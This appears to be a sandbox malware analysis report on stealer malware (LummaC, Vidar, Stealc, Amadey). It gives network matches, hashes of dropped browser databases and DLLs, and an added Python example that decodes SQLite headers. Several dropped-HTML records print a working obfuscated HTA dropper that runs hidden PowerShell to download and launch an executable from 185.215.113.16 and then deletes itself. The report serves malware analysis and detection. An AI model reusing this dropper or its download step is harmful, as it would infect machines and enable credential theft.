CLOUDFLARENETUS | Dl6wuWiQdg.exe | malicious | LummaC, Amadey, LummaC Stealer
• 104.21.112.1
CLOUDFLARENETUS | bzzF5OFbVi.exe | malicious | LummaC
• 104.21.64.1
CLOUDFLARENETUS | 6684V5n83w.exe | malicious | Vidar
• 172.64.41.3
CLOUDFLARENETUS | Bp4LoSXw83.lnk | malicious | Unknown
• 172.64.41.3
CLOUDFLARENETUS | x6VtGfW26X.exe | malicious | LummaC
• 104.21.112.1
CLOUDFLARENETUS | heteronymous.vbs | malicious | Remcos, GuLoader
• 172.67.136.42
CLOUDFLARENETUS | re5.mp4.hta | malicious | LummaC
• 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger, VIP Keylogger
• 188.114.96.3
WHOLESALECONNECTIONSNL | zhMQ0hNEmb.exe | malicious | LummaC
• 185.215.113.16
WHOLESALECONNECTIONSNL | 2RxMkSAgZ8.exe | malicious | LummaC
• 185.215.113.16
WHOLESALECONNECTIONSNL | Dl6wuWiQdg.exe | malicious | LummaC, Amadey, LummaC Stealer
• 185.215.113.16
WHOLESALECONNECTIONSNL | bzzF5OFbVi.exe | malicious | LummaC
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    • 185.215.113.206
                                                                                                                                                                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\freebl3.dll | random.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
C:\ProgramData\freebl3.dll | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
C:\ProgramData\freebl3.dll | 5uVReRlvME.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc
C:\ProgramData\freebl3.dll | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
C:\ProgramData\freebl3.dll | i8Vwc7iOaG.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar
C:\ProgramData\freebl3.dll | glpEv3POe7.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | gYjK72gL17.exe | malicious | Stealc, Vidar
C:\ProgramData\freebl3.dll | iUKUR1nUyD.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
C:\ProgramData\freebl3.dll | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine
Process: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.1358696453229276
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5: 28591AA4E12D1C4FC761BE7C0A468622
SHA1: BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256: 51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512: 5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious: false
Preview: SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type: SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 5242880
Entropy (8bit): 0.037963276276857943
Encrypted: false
SSDEEP: 192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5: C0FDF21AE11A6D1FA1201D502614B622
SHA1: 11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256: FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512: A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious: false
Preview: SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type: ASCII text, with very long lines (1809), with CRLF line terminators
Category: dropped
Size (bytes): 9571
Entropy (8bit): 5.536643647658967
Encrypted: false
SSDEEP: 192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5: 5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1: 72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256: 50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512: 57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious: false
Preview: // Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

Process: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 49152
Entropy (8bit): 0.8180424350137764
Encrypted: false
SSDEEP: 96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5: 349E6EB110E34A08924D92F6B334801D
SHA1: BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256: C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512: 2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious: false
Preview: SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
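The "File Type" and "Entropy (8bit)" fields in the dropped-file records above are derived directly from the file bytes: the SQLite description is a decode of the 100-byte SQLite 3 file header, and the entropy is the 8-bit Shannon entropy of the whole file. The Python below is an added example, not part of the Joe Sandbox report or its tooling, that reproduces both fields so an analyst can re-derive them from an exfiltrated database copy offline. The fixture is constructed: a header carrying the values from the first SQLite record above, zero-filled to the reported 106496 bytes (52 pages of 2048). The header_size_consistent() cross-check is an added triage heuristic, not a report field.

```python
"""Decode SQLite 3 header fields and 8-bit entropy as reported for dropped files.

Added example for the sandbox report above; the fixture is constructed, not a
real dropped file. Header layout follows the public SQLite file format
(all multi-byte integers big-endian).
"""
import math
import struct
from collections import Counter
from typing import Dict, Union

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}
HeaderFields = Dict[str, Union[int, str, bool]]


def shannon_entropy_bits(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 = constant, 8.0 = uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_sqlite(blob: bytes) -> bool:
    """Magic-string check; the header needs at least 100 bytes to decode."""
    return len(blob) >= 100 and blob[:16] == SQLITE_MAGIC


def parse_sqlite_header(blob: bytes) -> HeaderFields:
    """Decode the fields that file(1) and the report's 'File Type' line print."""
    if not is_sqlite(blob):
        raise ValueError("not an SQLite 3 database: magic string missing")
    raw_page_size = struct.unpack_from(">H", blob, 16)[0]
    change_counter, db_pages = struct.unpack_from(">II", blob, 24)
    schema_cookie, schema_format = struct.unpack_from(">II", blob, 40)
    text_encoding = struct.unpack_from(">I", blob, 56)[0]
    user_version = struct.unpack_from(">i", blob, 60)[0]
    version_valid_for, sqlite_version = struct.unpack_from(">II", blob, 92)
    return {
        "page_size": 65536 if raw_page_size == 1 else raw_page_size,  # 1 encodes 65536
        "writer_version": blob[18],  # 1 = rollback journal, 2 = WAL
        "read_version": blob[19],
        "file_change_counter": change_counter,
        "database_pages": db_pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(text_encoding, f"unknown({text_encoding})"),
        "user_version": user_version,
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
        # The in-header page count is only authoritative when these two match.
        "page_count_valid": change_counter == version_valid_for,
    }


def describe(blob: bytes) -> str:
    """Render the header in the 'File Type' wording used by the report."""
    h = parse_sqlite_header(blob)
    parts = ["SQLite 3.x database"]
    if h["user_version"]:
        parts.append(f"user version {h['user_version']}")
    parts += [f"last written using SQLite version {h['sqlite_version']}",
              f"page size {h['page_size']}"]
    if h["writer_version"] != 1 or h["read_version"] != 1:
        parts += [f"writer version {h['writer_version']}",
                  f"read version {h['read_version']}"]
    parts += [f"file counter {h['file_change_counter']}",
              f"database pages {h['database_pages']}",
              f"cookie 0x{h['schema_cookie']:x}",
              f"schema {h['schema_format']}",
              h["text_encoding"],
              f"version-valid-for {h['version_valid_for']}"]
    return ", ".join(parts)


def header_size_consistent(blob: bytes) -> bool:
    """Added heuristic: True when the valid in-header page count times the page
    size equals the file length. The format allows a longer file (SQLite may
    preallocate), so False alone is not evidence of corruption or tampering."""
    h = parse_sqlite_header(blob)
    return bool(h["page_count_valid"]) and h["page_size"] * h["database_pages"] == len(blob)


def build_sqlite_header(*, page_size: int, change_counter: int, db_pages: int,
                        schema_cookie: int, schema_format: int, user_version: int,
                        version_valid_for: int, sqlite_version: int,
                        writer_version: int = 1, read_version: int = 1,
                        text_encoding: int = 1) -> bytes:
    """Construct a synthetic 100-byte header (test fixture, not a real file)."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18], hdr[19] = writer_version, read_version
    hdr[21:24] = bytes((64, 32, 32))  # fixed payload-fraction bytes the format requires
    struct.pack_into(">II", hdr, 24, change_counter, db_pages)
    struct.pack_into(">II", hdr, 40, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, text_encoding)
    struct.pack_into(">i", hdr, 60, user_version)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


# Constructed fixture mirroring the first SQLite record: header values from the
# report, body zero-filled to the reported 106496 bytes (52 pages x 2048).
SAMPLE_DB: bytes = build_sqlite_header(page_size=2048, change_counter=3, db_pages=52,
                                       schema_cookie=0x21, schema_format=4, user_version=0,
                                       version_valid_for=3, sqlite_version=3042000)
SAMPLE_DB += bytes(106496 - len(SAMPLE_DB))

if __name__ == "__main__":
    print(describe(SAMPLE_DB))
    print(f"entropy={shannon_entropy_bits(SAMPLE_DB):.3f} "
          f"size_consistent={header_size_consistent(SAMPLE_DB)}")
```

For four of the five SQLite records above, Size (bytes) equals database pages times page size (for example 52 x 2048 = 106496); the 5242880-byte file is longer than its 46 x 32768 pages, which the format permits, so that mismatch by itself says nothing about tampering. The low entropies reported (all below 1.2 bits per byte) are what mostly-empty SQLite page files look like and are consistent with "Encrypted: false"; the fixture's entropy is lower still because its body is all zeros.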

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:550686C0EE48C386DFCB40199BD076AC
SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: random.exe, Detection: malicious
• Filename: 8WFJ38EJo5.exe, Detection: malicious
• Filename: w22319us3M.exe, Detection: malicious
• Filename: 5uVReRlvME.exe, Detection: malicious
• Filename: DRWgoZo325.exe, Detection: malicious
• Filename: i8Vwc7iOaG.exe, Detection: malicious
• Filename: glpEv3POe7.exe, Detection: malicious
• Filename: gYjK72gL17.exe, Detection: malicious
• Filename: iUKUR1nUyD.exe, Detection: malicious
• Filename: cMTqzvmx9u.exe, Detection: malicious

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:5FF1FCA37C466D6723EC67BE93B51442
SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:4E52D739C324DB8225BD9AB2695F262F
SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\.gif, Author: Joe Security
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):956
                                                                                                                                                                                                                        Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                        MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                        SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                        SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                        SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                        Malicious:false
